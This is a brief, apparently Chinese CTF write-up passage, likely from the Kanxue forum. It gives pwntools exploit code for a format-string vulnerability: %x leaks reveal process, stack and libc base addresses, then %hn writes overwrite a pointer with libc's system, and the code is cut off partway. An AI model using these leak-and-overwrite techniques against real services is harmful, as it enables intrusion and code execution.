这道题的解法需要接收大量数据，前期一直网络不好没法实现，一直怀疑自己的解不正确，最后等晚上条件好了再突破成功。

say(1, '%3$x,%5$x,%8$x,%11$x,')

proc_base = int(p.recvuntil(',',drop=True),16) - 0x8F3

stack_addr = int(p.recvuntil(',',drop=True), 16)

print 'stack_addr ', hex(stack_addr)

stack_base = int(p.recvuntil(',',drop=True), 16) - 0x40

libc_base = int(p.recvuntil(',',drop=True), 16) - (0xf7e1b637 - 0xf7e03000)

print 'proc_base ',hex(proc_base)

print 'stack_base ', hex(stack_base)

print 'libc_base ', hex(libc_base)

libc.address = libc_base

target = (stack_base + 11 *4 + 0x10) & 0xffff

# 0xffffd43c -> system

print 'system ', hex(libc.symbols['system'])

payload = '%' + str(target) + 'c%5$hn'

print len(payload)

say(1, payload)

say(1, '%53$x')

target2 = (libc.symbols['system']) & 0xffff

payload = '%' + str(target2) + 'c%53$hn'

say(1, payload)

payload = '%' + str(target + 2) + 'c%5$hn'

[注意]看雪招聘，专注安全领域的专业人才平台！